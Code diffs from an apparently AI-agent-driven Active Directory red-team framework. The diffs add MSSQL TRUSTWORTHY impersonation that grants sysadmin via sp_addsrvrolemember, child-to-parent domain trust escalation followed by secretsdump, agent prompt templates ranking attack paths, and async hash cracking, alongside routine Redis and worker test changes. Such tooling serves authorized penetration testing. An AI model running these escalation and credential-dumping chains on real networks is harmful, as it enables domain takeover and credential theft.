+        if predicate():
+            task_id = await handler()
+            break
 
     if not task_id:
         logger.warning(f"Failed to dispatch exploitation for {vuln_type}")

--- a/src/ares/main.py
+++ b/src/ares/main.py
@@ -753,6 +753,9 @@ async def worker(
     except Exception as e:
         logger.warning(f"Dreadnode platform unavailable, continuing without telemetry: {e}")
 
+    if not operation_id:
+        operation_id = os.getenv("OPERATION_ID", "")
+
     # Log startup
     logger.info("=" * 60)
     logger.info(f"ARES WORKER AGENT: {role.upper()}")

--- a/src/ares/templates/redteam/agents/privesc.md.jinja
+++ b/src/ares/templates/redteam/agents/privesc.md.jinja
@@ -92,6 +92,18 @@ mssql_xp_cmdshell(
 → Execute as SA
 ```
 
+### Database-Level Impersonation (TRUSTWORTHY)
+When a database has `is_trustworthy_on=1` and db_owner/impersonate rights:
+```
+mssql_execute_as_user(
+    target="sql.domain.com",
+    database="msdb",
+    query="SELECT SYSTEM_USER; EXEC sp_addsrvrolemember 'your_user','sysadmin';",
+    impersonate_user="dbo"
+)
+→ Escalate to sysadmin, then use mssql_xp_cmdshell
+```
+
 ### Linked Servers
 When linked servers exist:
 ```
@@ -101,6 +113,20 @@ mssql_exec_linked(
     query="SELECT * FROM master..syslogins"
 )
 → Execute on remote server
+```
+
+## Trust Attacks
+
+### Child-to-Parent Escalation
+When a child domain krbtgt hash is available:
+```
+raise_child(
+    child_domain="child.domain.local",
+    username="user",
+    password="pass",  # pragma: allowlist secret
+    target_domain="parent.domain.local"
+)
+→ Enterprise Admin, then secretsdump parent DCs
 ```
 
 ## CVE Exploitation

--- a/src/ares/templates/redteam/agents/system_instructions.md.jinja
+++ b/src/ares/templates/redteam/agents/system_instructions.md.jinja
@@ -144,10 +144,14 @@ IF BloodHound or delegation tools find opportunities:
 | Constrained (alt service) | constrained_delegation_s4u with alt_service | Access different service |
 | RBCD | add_computer → rbcd_write → get_st → secretsdump | Admin on target |
 
+**Trust Escalation:**
+- Child-domain krbtgt hash → raise_child → secretsdump parent DCs
+
 **MSSQL Pivoting:**
 - mssql_enum_linked_servers → find linked servers
 - mssql_exec_linked → execute on linked servers (cross-domain/forest)
 - mssql_ntlm_coerce → capture machine account hash for relay
+- mssql_execute_as_user → database-level impersonation (TRUSTWORTHY/db_owner)
 
 ### 🟢 PRIORITY 4: Share Access Discovery
 
@@ -290,7 +294,7 @@ Create executive summary including:
 | 0 | Low-hanging fruit | ldap_search_descriptions, username_as_password, password_spray, password_policy |
 | 1 | ADCS ESC1 | certipy_req_esc1 → certipy_auth → secretsdump |
 | 2 | ADCS ESC4 | certipy_template_esc4 → certipy_req_esc1 → certipy_auth |
-| 3 | ADCS ESC8 | certipy_relay_esc8 + petitpotam → certipy_auth |
+| 3 | ADCS ESC8 | certipy_relay_esc8 + petitpotam/coercer → certipy_auth |
 | 4 | Shadow Credentials | certipy_shadow_auto (one-step GenericAll/Write exploit) |
 | 5 | ACL - ForceChangePassword | force_change_password → secretsdump |
 | 6 | ACL - Targeted Kerberoast | targeted_kerberoast → crack → secretsdump |
@@ -298,10 +302,12 @@ Create executive summary including:
 | 8 | Constrained delegation | constrained_delegation_s4u → service access |
 | 9 | RBCD | add_computer → rbcd_write → get_st → secretsdump |
 | 10 | MSSQL impersonation | mssql_xp_cmdshell with impersonate='sa' |
-| 11 | MSSQL linked servers | mssql_enum_linked_servers → mssql_exec_linked |
-| 12 | noPac CVE | nopac → impersonate DC |
-| 13 | Golden ticket | generate_golden_ticket → secretsdump all DCs |
-| 14 | LAPS | laps_dump → local admin access |
+| 11 | MSSQL trustworthy DB | mssql_execute_as_user (dbo) → mssql_xp_cmdshell |
+| 12 | MSSQL linked servers | mssql_enum_linked_servers → mssql_exec_linked |
+| 13 | Trust escalation | raise_child → secretsdump parent DCs |
+| 14 | noPac CVE | nopac → impersonate DC |
+| 15 | Golden ticket | generate_golden_ticket → secretsdump all DCs |
+| 16 | LAPS | laps_dump → local admin access |
 
 **If one path fails, IMMEDIATELY try the next.**
 

--- a/src/ares/tools/red/network.py
+++ b/src/ares/tools/red/network.py
@@ -3797,7 +3797,12 @@ class MSSQLTools(Toolset):
             logger.info(f"[*] Testing MSSQL login to {target}")
             # Use a simple enumeration command - SQL is intentional for pentest tool
             # nosec B608 - intentional SQL for MSSQL pentest enumeration
-            sql_query = "SELECT name FROM master.sys.databases; SELECT * FROM fn_my_permissions(NULL, 'SERVER');"
+            sql_query = (
+                "SELECT name FROM master.sys.databases; "
+                "SELECT name, is_trustworthy_on FROM sys.databases; "
+                "SELECT * FROM fn_my_permissions(NULL, 'SERVER'); "
+                "SELECT * FROM fn_my_permissions(NULL, 'DATABASE');"
+            )
             enum_cmd = f"echo '{sql_query}' | mssqlclient.py {target_string}"
             if windows_auth:
                 enum_cmd += " -windows-auth"
@@ -3808,6 +3813,11 @@ class MSSQLTools(Toolset):
             if "impersonate" in result.lower() or "control server" in result.lower():
                 logger.warning("[!] IMPERSONATION or CONTROL SERVER permission found!")
                 result = "🚨 IMPERSONATION POSSIBLE - Use mssql_impersonate next!\n\n" + result
+            if "is_trustworthy_on" in result.lower() and "1" in result:
+                result = (
+                    "🚨 TRUSTWORTHY DATABASE DETECTED - Check DB-level impersonation:\n"
+                    "→ Use mssql_execute_as_user with impersonate_user='dbo'\n\n" + result
+                )
 
             return result
 
@@ -3876,6 +3886,67 @@ class MSSQLTools(Toolset):
 
         except Exception as e:
             return f"xp_cmdshell failed: {e}"
+
+    @dn.tool_method
+    def mssql_execute_as_user(
+        self,
+        target: str,
+        username: str,
+        password: str,
+        query: str,
+        database: str | None = None,
+        domain: str | None = None,
+        windows_auth: bool = True,
+        impersonate_user: str = "dbo",
+    ) -> str:
+        """
+        Execute a query as a database principal (EXECUTE AS USER).
+
+        Use when database-level impersonation is possible, especially with
+        TRUSTWORTHY databases, to escalate toward server-level privileges.
+
+        Args:
+            target: MSSQL server IP
+            username: Username for authentication
+            password: Password for authentication
+            query: SQL query to execute as the impersonated user
+            database: Database name to run the query against (optional)
+            domain: Domain for Windows auth
+            windows_auth: Use Windows authentication
+            impersonate_user: Database principal to impersonate (default: dbo)
+
+        Returns:
+            Query output
+        """
+        if domain:
+            target_string = f"{domain}/{username}:{password}@{target}"
+        else:
+            target_string = f"{username}:{password}@{target}"
+
+        sql_commands = []
+        if database:
+            sql_commands.append(f"USE [{database}];")
+        sql_commands.append(f"EXECUTE AS USER = '{impersonate_user}';")
+        sql_commands.append(query)
+        sql_commands.append("REVERT;")
+        sql_script = " ".join(sql_commands)
+
+        cmd_string = f'echo "{sql_script}" | mssqlclient.py {target_string}'
+        if windows_auth:
+            cmd_string += " -windows-auth"
+
+        try:
+            logger.info(
+                "[*] Executing query as %s on %s (db=%s)",
+                impersonate_user,
+                target,
+                database or "default",
+            )
+            stdout, stderr, _ = _run_tool(["bash", "-c", cmd_string], timeout_seconds=120)
+            return stdout + "\n" + (stderr or "")
+
+        except Exception as e:
+            return f"mssql_execute_as_user failed: {e}"
 
     @dn.tool_method
     def mssql_enum_linked_servers(

--- a/src/ares/tools/red/network.py
+++ b/src/ares/tools/red/network.py
@@ -6,6 +6,7 @@ password cracking, share pilfering, and golden ticket generation.
 All tools execute commands remotely on the Kali attack box via AWS SSM.
 """
 
+import asyncio
 import json
 import logging
 import re
@@ -110,6 +111,23 @@ def _write_users_file_remote(users: list[str], users_file: str) -> tuple[bool, s
         error = (result.stderr or result.stdout or "unknown error").strip()
         return False, error
     return True, ""
+
+
+def _remote_file_exists(path: str) -> tuple[bool, str]:
+    cmd = f"test -s {shlex.quote(path)}"
+    result = run_remote(["bash", "-lc", cmd], timeout_seconds=30)
+    if result.return_code == 0:
+        return True, ""
+    error = (result.stderr or result.stdout or "file not found").strip()
+    return False, error
+
+
+def _find_remote_users_file(paths: list[str]) -> str | None:
+    for path in paths:
+        ok, _ = _remote_file_exists(path)
+        if ok:
+            return path
+    return None
 
 
 class NetworkEnumerationTools(Toolset):
@@ -921,8 +939,16 @@ class CredentialDiscoveryTools(Toolset):
                 logger.info(f"[*] No users file provided, auto-enumerating from {target}")
                 enumerated_file = self._enumerate_users_to_file(target)
                 if not enumerated_file:
-                    return "[!] Failed to enumerate users and no users_file provided. Try save_users_to_file first."
-                users_file = enumerated_file
+                    fallback = _find_remote_users_file(["/tmp/users.txt", "/tmp/users_auto.txt"])  # nosec B108 # noqa: S108
+                    if not fallback:
+                        return (
+                            "[!] Failed to enumerate users and no users_file provided. "
+                            "Try save_users_to_file first."
+                        )
+                    logger.info(f"[*] Using existing users file on remote: {fallback}")
+                    users_file = fallback
+                else:
+                    users_file = enumerated_file
 
             cmd = [
                 "netexec",
@@ -1059,8 +1085,16 @@ class CredentialDiscoveryTools(Toolset):
                 logger.info(f"[*] No users file provided, auto-enumerating from {target}")
                 enumerated_file = self._enumerate_users_to_file(target)
                 if not enumerated_file:
-                    return "[!] Failed to enumerate users and no users_file provided. Try save_users_to_file first."
-                users_file = enumerated_file
+                    fallback = _find_remote_users_file(["/tmp/users.txt", "/tmp/users_auto.txt"])  # nosec B108 # noqa: S108
+                    if not fallback:
+                        return (
+                            "[!] Failed to enumerate users and no users_file provided. "
+                            "Try save_users_to_file first."
+                        )
+                    logger.info(f"[*] Using existing users file on remote: {fallback}")
+                    users_file = fallback
+                else:
+                    users_file = enumerated_file
 
             # netexec's --no-bruteforce flag tests user1:user1, user2:user2, etc.
             cmd = [
@@ -1689,7 +1723,7 @@ class CrackingTools(Toolset):
         self.state = state
 
     @dn.tool_method
-    def crack_with_hashcat(
+    async def crack_with_hashcat(
         self,
         hash_value: str,
         hashcat_mode: int = 13100,
@@ -1733,7 +1767,8 @@ hashcat -m {hashcat_mode} -a 0 {hash_file_path} {wordlist_path} --runtime {max_t
 hashcat -m {hashcat_mode} {hash_file_path} --show 2>&1
 rm -f {hash_file_path}
 """
-            stdout, stderr, _ = _run_tool(
+            stdout, stderr, _ = await asyncio.to_thread(
+                _run_tool,
                 ["bash", "-c", cmd],
                 timeout_seconds=(max_time_minutes * 60) + 60,
             )
@@ -1750,7 +1785,7 @@ rm -f {hash_file_path}
             return output + f"\nError: {e!s}"
 
     @dn.tool_method
-    def crack_with_john(
+    async def crack_with_john(
         self,
         hash_value: str,
         hash_format: str = "krb5asrep",
@@ -1794,7 +1829,8 @@ john --wordlist={wordlist_path} --format={hash_format} {hash_file_path} --sessio
 john --show --format={hash_format} {hash_file_path} 2>&1
 rm -f {hash_file_path} {session_name}.pot {session_name}.rec {session_name}.log
 """
-            stdout, stderr, _ = _run_tool(
+            stdout, stderr, _ = await asyncio.to_thread(
+                _run_tool,
                 ["bash", "-c", cmd],
                 timeout_seconds=(max_time_minutes * 60) + 60,
             )

--- a/tests/integration/test_redis_task_queue_integration.py
+++ b/tests/integration/test_redis_task_queue_integration.py
@@ -642,6 +642,7 @@ class TestOrchestratorWorkerFlow:
             dispatcher.request_lateral_movement(
                 target_host="192.168.1.10",
                 username="admin",
+                password="TestPass123!",  # pragma: allowlist secret
                 source_agent="orchestrator",
             ),
             dispatcher.request_acl_analysis(

--- a/tests/test_redis_client.py
+++ b/tests/test_redis_client.py
@@ -1,0 +1,136 @@
+"""Tests for Redis client helpers."""
+
+from __future__ import annotations
+
+import sys
+import types
+from typing import Any
+from unittest.mock import MagicMock
+
+import pytest
+
+from ares.core.redis_client import create_redis_client, get_redis_sentinel_config
+
+
+class DummySentinel:
+    def __init__(
+        self,
+        hosts: list[tuple[str, int]],
+        **kwargs: Any,
+    ) -> None:
+        self.hosts = hosts
+        self.kwargs = kwargs
+        self.master = None
+        self.master_kwargs: dict[str, Any] | None = None
+
+    def master_for(self, master: str, **kwargs: Any):
+        self.master = master
+        self.master_kwargs = kwargs
+        return "sentinel-client"
+
+
+def install_dummy_redis(monkeypatch: pytest.MonkeyPatch) -> types.ModuleType:
+    redis_module = types.ModuleType("redis")
+    asyncio_module = types.ModuleType("redis.asyncio")
+    redis_module.asyncio = asyncio_module
+    monkeypatch.setitem(sys.modules, "redis", redis_module)
+    monkeypatch.setitem(sys.modules, "redis.asyncio", asyncio_module)
+    return asyncio_module
+
+
+def test_get_redis_sentinel_config_missing(monkeypatch: pytest.MonkeyPatch) -> None:
+    monkeypatch.delenv("REDIS_SENTINEL_HOST", raising=False)
+    monkeypatch.delenv("REDIS_SENTINEL_MASTER", raising=False)
+
+    assert get_redis_sentinel_config() is None
+
+
+def test_get_redis_sentinel_config_defaults(monkeypatch: pytest.MonkeyPatch) -> None:
+    monkeypatch.setenv("REDIS_SENTINEL_HOST", "sentinel")
+    monkeypatch.setenv("REDIS_SENTINEL_MASTER", "mymaster")
+    monkeypatch.setenv("REDIS_PASSWORD", "redis-pass")  # pragma: allowlist secret
+
+    config = get_redis_sentinel_config()
+
+    assert config == {
+        "host": "sentinel",
+        "port": 26379,
+        "master": "mymaster",
+        "sentinel_password": "redis-pass",  # pragma: allowlist secret
+        "redis_password": "redis-pass",  # pragma: allowlist secret
+        "db": 0,
+    }
+
+
+def test_get_redis_sentinel_config_passwords(monkeypatch: pytest.MonkeyPatch) -> None:
+    monkeypatch.setenv("REDIS_SENTINEL_HOST", "sentinel")
+    monkeypatch.setenv("REDIS_SENTINEL_MASTER", "mymaster")
+    monkeypatch.setenv("REDIS_SENTINEL_PASSWORD", "sentinel-pass")  # pragma: allowlist secret
+    monkeypatch.setenv("REDIS_PASSWORD", "redis-pass")  # pragma: allowlist secret
+    monkeypatch.setenv("REDIS_DB", "2")
+    monkeypatch.setenv("REDIS_SENTINEL_PORT", "6380")
+
+    config = get_redis_sentinel_config()
+
+    assert config == {
+        "host": "sentinel",
+        "port": 6380,
+        "master": "mymaster",
+        "sentinel_password": "sentinel-pass",  # pragma: allowlist secret
+        "redis_password": "redis-pass",  # pragma: allowlist secret
+        "db": 2,
+    }
+
+
+@pytest.mark.asyncio
+async def test_create_redis_client_uses_sentinel(monkeypatch: pytest.MonkeyPatch) -> None:
+    asyncio_module = install_dummy_redis(monkeypatch)
+    sentinel_instances: list[DummySentinel] = []
+
+    class TrackingSentinel(DummySentinel):
+        def __init__(self, hosts: list[tuple[str, int]], **kwargs: Any) -> None:
+            super().__init__(hosts, **kwargs)
+            sentinel_instances.append(self)
+
+    asyncio_module.Sentinel = TrackingSentinel
+    asyncio_module.from_url = MagicMock(return_value="url-client")
+
+    monkeypatch.setenv("REDIS_SENTINEL_HOST", "sentinel")
+    monkeypatch.setenv("REDIS_SENTINEL_MASTER", "mymaster")
+    monkeypatch.setenv("REDIS_SENTINEL_PORT", "26379")
+    monkeypatch.setenv("REDIS_SENTINEL_PASSWORD", "sentinel-pass")
+    monkeypatch.setenv("REDIS_PASSWORD", "redis-pass")
+    monkeypatch.setenv("REDIS_DB", "1")
+
+    client = await create_redis_client("redis://localhost", decode_responses=True)
+
+    assert client == "sentinel-client"
+    assert asyncio_module.from_url.call_count == 0
+
+    assert len(sentinel_instances) == 1
+    sentinel_instance = sentinel_instances[0]
+    assert sentinel_instance.hosts == [("sentinel", 26379)]
+    assert sentinel_instance.master == "mymaster"
+    assert sentinel_instance.master_kwargs == {
+        "password": "redis-pass",  # pragma: allowlist secret
+        "db": 1,
+        "decode_responses": True,
+        "socket_timeout": None,
+        "socket_connect_timeout": 5.0,
+        "health_check_interval": 10.0,
+    }
+
+
+@pytest.mark.asyncio
+async def test_create_redis_client_uses_url(monkeypatch: pytest.MonkeyPatch) -> None:
+    asyncio_module = install_dummy_redis(monkeypatch)
+    asyncio_module.Sentinel = DummySentinel
+    asyncio_module.from_url = MagicMock(return_value="url-client")
+
+    monkeypatch.delenv("REDIS_SENTINEL_HOST", raising=False)
+    monkeypatch.delenv("REDIS_SENTINEL_MASTER", raising=False)
+
+    client = await create_redis_client("redis://localhost", decode_responses=True)
+
+    assert client == "url-client"
+    asyncio_module.from_url.assert_called_once()

--- a/tests/test_worker.py
+++ b/tests/test_worker.py
@@ -78,7 +78,17 @@ class TestDiscoverActiveOperationFindsOperation:
         from ares.core.worker import discover_active_operation
 
         mock_client, redis_patch = mock_redis_setup
-        mock_client.get = AsyncMock(return_value=recent_checkpoint_time)
+
+        # Mock get to return None for pointer key, checkpoint time for checkpoint keys
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return recent_checkpoint_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         async def mock_scan_iter(pattern):
             yield "ares:operation:test-op-001:state"
@@ -108,6 +118,8 @@ class TestDiscoverActiveOperationFindsOperation:
         mock_client.scan_iter = mock_scan_iter
 
         async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
             if "old-op" in key:
                 return older_time
             if "new-op" in key:
@@ -115,6 +127,7 @@ class TestDiscoverActiveOperationFindsOperation:
             return None
 
         mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         with redis_patch:
             result = await discover_active_operation("redis://localhost:6379", max_wait=5)
@@ -127,7 +140,16 @@ class TestDiscoverActiveOperationFindsOperation:
         from ares.core.worker import discover_active_operation
 
         mock_client, redis_patch = mock_redis_setup
-        mock_client.get = AsyncMock(return_value=stale_checkpoint_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return stale_checkpoint_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         async def mock_scan_iter(pattern):
             yield "ares:operation:stale-op:state"
@@ -307,7 +329,16 @@ class TestDiscoverActiveOperationIndefiniteWait:
 
         now = datetime.now(timezone.utc)
         recent_time = (now - timedelta(seconds=30)).isoformat()
-        mock_client.get = AsyncMock(return_value=recent_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return recent_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         iteration_count = 0
 
@@ -335,7 +366,16 @@ class TestDiscoverActiveOperationIndefiniteWait:
 
         now = datetime.now(timezone.utc)
         recent_time = (now - timedelta(seconds=30)).isoformat()
-        mock_client.get = AsyncMock(return_value=recent_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return recent_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         iteration_count = 0
         max_iterations = 5
@@ -375,7 +415,16 @@ class TestDiscoverActiveOperationErrorHandling:
 
         now = datetime.now(timezone.utc)
         recent_time = (now - timedelta(seconds=30)).isoformat()
-        mock_client.get = AsyncMock(return_value=recent_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return recent_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         error_count = 0
 
@@ -420,7 +469,16 @@ class TestDiscoverActiveOperationTimezoneHandling:
         # So we need to create a naive time that's recent in UTC terms
         now_utc = datetime.now(timezone.utc)
         naive_time = now_utc.replace(tzinfo=None).isoformat()
-        mock_client.get = AsyncMock(return_value=naive_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return naive_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         async def mock_scan_iter(pattern):
             yield "ares:operation:naive-tz-op:state"
@@ -441,7 +499,16 @@ class TestDiscoverActiveOperationTimezoneHandling:
 
         # Create an aware datetime with explicit UTC timezone
         aware_time = datetime.now(timezone.utc).isoformat()
-        mock_client.get = AsyncMock(return_value=aware_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return aware_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         async def mock_scan_iter(pattern):
             yield "ares:operation:aware-tz-op:state"
@@ -545,7 +612,16 @@ class TestDiscoverActiveOperationExponentialBackoff:
 
         now = datetime.now(timezone.utc)
         recent_time = (now - timedelta(seconds=30)).isoformat()
-        mock_client.get = AsyncMock(return_value=recent_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return recent_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         error_count = 0
         sleep_delays = []
@@ -589,7 +665,16 @@ class TestDiscoverActiveOperationExponentialBackoff:
 
         now = datetime.now(timezone.utc)
         recent_time = (now - timedelta(seconds=30)).isoformat()
-        mock_client.get = AsyncMock(return_value=recent_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return recent_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         error_count = 0
         sleep_delays = []
@@ -627,7 +712,16 @@ class TestDiscoverActiveOperationExponentialBackoff:
 
         now = datetime.now(timezone.utc)
         recent_time = (now - timedelta(seconds=30)).isoformat()
-        mock_client.get = AsyncMock(return_value=recent_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return recent_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         call_count = 0
         sleep_delays = []
@@ -679,7 +773,16 @@ class TestDiscoverActiveOperationConnectionReuse:
 
         now = datetime.now(timezone.utc)
         recent_time = (now - timedelta(seconds=30)).isoformat()
-        mock_client.get = AsyncMock(return_value=recent_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return recent_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         iteration_count = 0
 
@@ -716,7 +819,16 @@ class TestDiscoverActiveOperationConnectionReuse:
 
         now = datetime.now(timezone.utc)
         recent_time = (now - timedelta(seconds=30)).isoformat()
-        mock_client.get = AsyncMock(return_value=recent_time)
+
+        async def mock_get(key):
+            if key == "ares:operation:active":
+                return None
+            if ":checkpoint_time" in key:
+                return recent_time
+            return None
+
+        mock_client.get = mock_get
+        mock_client.exists = AsyncMock(return_value=True)
 
         error_count = 0
 

--- a/tests/test_worker.py
+++ b/tests/test_worker.py
@@ -51,17 +51,17 @@ def mock_redis_setup():
 
 
 @pytest.fixture
-def recent_checkpoint_time() -> bytes:
+def recent_checkpoint_time() -> str:
     """Return a recent checkpoint time (within max_operation_age)."""
     recent = datetime.now(timezone.utc) - timedelta(seconds=60)
-    return recent.isoformat().encode()
+    return recent.isoformat()
 
 
 @pytest.fixture
-def stale_checkpoint_time() -> bytes:
+def stale_checkpoint_time() -> str:
     """Return a stale checkpoint time (older than max_operation_age)."""
     stale = datetime.now(timezone.utc) - timedelta(seconds=600)
-    return stale.isoformat().encode()
+    return stale.isoformat()
 
 
 # ============================================================================
@@ -81,7 +81,7 @@ class TestDiscoverActiveOperationFindsOperation:
         mock_client.get = AsyncMock(return_value=recent_checkpoint_time)
 
         async def mock_scan_iter(pattern):
-            yield b"ares:operation:test-op-001:state"
+            yield "ares:operation:test-op-001:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -98,12 +98,12 @@ class TestDiscoverActiveOperationFindsOperation:
         mock_client, redis_patch = mock_redis_setup
 
         now = datetime.now(timezone.utc)
-        older_time = (now - timedelta(seconds=120)).isoformat().encode()
-        newer_time = (now - timedelta(seconds=30)).isoformat().encode()
+        older_time = (now - timedelta(seconds=120)).isoformat()
+        newer_time = (now - timedelta(seconds=30)).isoformat()
 
         async def mock_scan_iter(pattern):
-            yield b"ares:operation:old-op:state"
-            yield b"ares:operation:new-op:state"
+            yield "ares:operation:old-op:state"
+            yield "ares:operation:new-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -130,7 +130,7 @@ class TestDiscoverActiveOperationFindsOperation:
         mock_client.get = AsyncMock(return_value=stale_checkpoint_time)
 
         async def mock_scan_iter(pattern):
-            yield b"ares:operation:stale-op:state"
+            yield "ares:operation:stale-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -188,7 +188,13 @@ class TestRunWorkerModelResolution:
         monkeypatch.delenv("ARES_WORKER_MODEL", raising=False)
         monkeypatch.delenv("ARES_MODEL", raising=False)
 
-        with patch("ares.core.worker.logger") as mock_logger:
+        with (
+            patch(
+                "ares.core.worker.get_operation_model_overrides", new=AsyncMock(return_value=None)
+            ),
+            patch("ares.core.worker.get_operation_model", new=AsyncMock(return_value=None)),
+            patch("ares.core.worker.logger") as mock_logger,
+        ):
             result = await run_worker(
                 role=AgentRole.ENUM,
                 operation_id="op-1",
@@ -265,6 +271,10 @@ class TestRunWorkerCallbacks:
             worker_module, "create_agent_info", lambda *_args, **_kwargs: agent_info
         )
         monkeypatch.setattr(worker_module, callback_attr, DummyCallback)
+        monkeypatch.setattr(
+            worker_module, "get_operation_model_overrides", AsyncMock(return_value=None)
+        )
+        monkeypatch.setattr(worker_module, "get_operation_model", AsyncMock(return_value=None))
 
         create_agent_mock = MagicMock()
         monkeypatch.setattr(worker_module, "create_specialized_agent", create_agent_mock)
@@ -296,7 +306,7 @@ class TestDiscoverActiveOperationIndefiniteWait:
         mock_client, redis_patch = mock_redis_setup
 
         now = datetime.now(timezone.utc)
-        recent_time = (now - timedelta(seconds=30)).isoformat().encode()
+        recent_time = (now - timedelta(seconds=30)).isoformat()
         mock_client.get = AsyncMock(return_value=recent_time)
 
         iteration_count = 0
@@ -305,7 +315,7 @@ class TestDiscoverActiveOperationIndefiniteWait:
             nonlocal iteration_count
             iteration_count += 1
             if iteration_count >= 3:
-                yield b"ares:operation:found-op:state"
+                yield "ares:operation:found-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -324,7 +334,7 @@ class TestDiscoverActiveOperationIndefiniteWait:
         mock_client, redis_patch = mock_redis_setup
 
         now = datetime.now(timezone.utc)
-        recent_time = (now - timedelta(seconds=30)).isoformat().encode()
+        recent_time = (now - timedelta(seconds=30)).isoformat()
         mock_client.get = AsyncMock(return_value=recent_time)
 
         iteration_count = 0
@@ -334,7 +344,7 @@ class TestDiscoverActiveOperationIndefiniteWait:
             nonlocal iteration_count
             iteration_count += 1
             if iteration_count >= max_iterations:
-                yield b"ares:operation:test-op:state"
+                yield "ares:operation:test-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -364,7 +374,7 @@ class TestDiscoverActiveOperationErrorHandling:
         mock_client, redis_patch = mock_redis_setup
 
         now = datetime.now(timezone.utc)
-        recent_time = (now - timedelta(seconds=30)).isoformat().encode()
+        recent_time = (now - timedelta(seconds=30)).isoformat()
         mock_client.get = AsyncMock(return_value=recent_time)
 
         error_count = 0
@@ -374,7 +384,7 @@ class TestDiscoverActiveOperationErrorHandling:
             error_count += 1
             if error_count < 3:
                 raise ConnectionError("Redis connection failed")
-            yield b"ares:operation:recovered-op:state"
+            yield "ares:operation:recovered-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -409,11 +419,11 @@ class TestDiscoverActiveOperationTimezoneHandling:
         # The code does: checkpoint_time.replace(tzinfo=timezone.utc)
         # So we need to create a naive time that's recent in UTC terms
         now_utc = datetime.now(timezone.utc)
-        naive_time = now_utc.replace(tzinfo=None).isoformat().encode()
+        naive_time = now_utc.replace(tzinfo=None).isoformat()
         mock_client.get = AsyncMock(return_value=naive_time)
 
         async def mock_scan_iter(pattern):
-            yield b"ares:operation:naive-tz-op:state"
+            yield "ares:operation:naive-tz-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -430,11 +440,11 @@ class TestDiscoverActiveOperationTimezoneHandling:
         mock_client, redis_patch = mock_redis_setup
 
         # Create an aware datetime with explicit UTC timezone
-        aware_time = datetime.now(timezone.utc).isoformat().encode()
+        aware_time = datetime.now(timezone.utc).isoformat()
         mock_client.get = AsyncMock(return_value=aware_time)
 
         async def mock_scan_iter(pattern):
-            yield b"ares:operation:aware-tz-op:state"
+            yield "ares:operation:aware-tz-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -534,7 +544,7 @@ class TestDiscoverActiveOperationExponentialBackoff:
         mock_client, redis_patch = mock_redis_setup
 
         now = datetime.now(timezone.utc)
-        recent_time = (now - timedelta(seconds=30)).isoformat().encode()
+        recent_time = (now - timedelta(seconds=30)).isoformat()
         mock_client.get = AsyncMock(return_value=recent_time)
 
         error_count = 0
@@ -545,7 +555,7 @@ class TestDiscoverActiveOperationExponentialBackoff:
             error_count += 1
             if error_count < 4:
                 raise ConnectionError("Redis connection failed")
-            yield b"ares:operation:recovered-op:state"
+            yield "ares:operation:recovered-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -578,7 +588,7 @@ class TestDiscoverActiveOperationExponentialBackoff:
         mock_client, redis_patch = mock_redis_setup
 
         now = datetime.now(timezone.utc)
-        recent_time = (now - timedelta(seconds=30)).isoformat().encode()
+        recent_time = (now - timedelta(seconds=30)).isoformat()
         mock_client.get = AsyncMock(return_value=recent_time)
 
         error_count = 0
@@ -589,7 +599,7 @@ class TestDiscoverActiveOperationExponentialBackoff:
             error_count += 1
             if error_count < 10:
                 raise ConnectionError("Redis connection failed")
-            yield b"ares:operation:recovered-op:state"
+            yield "ares:operation:recovered-op:state"
 
         mock_client.scan_iter = mock_scan_iter
 
@@ -616,7 +626,7 @@ class TestDiscoverActiveOperationExponentialBackoff:
         mock_client, redis_patch = mock_redis_setup
 
         now = datetime.now(timezone.utc)
-        recent_time = (now - timedelta(seconds=30)).isoformat().encode()
+        recent_time = (now - timedelta(seconds=30)).isoformat()
         mock_client.get = AsyncMock(return_value=recent_time)
 
         call_count = 0
@@ -634,7 +644,7 @@ class TestDiscoverActiveOperationExponentialBackoff:
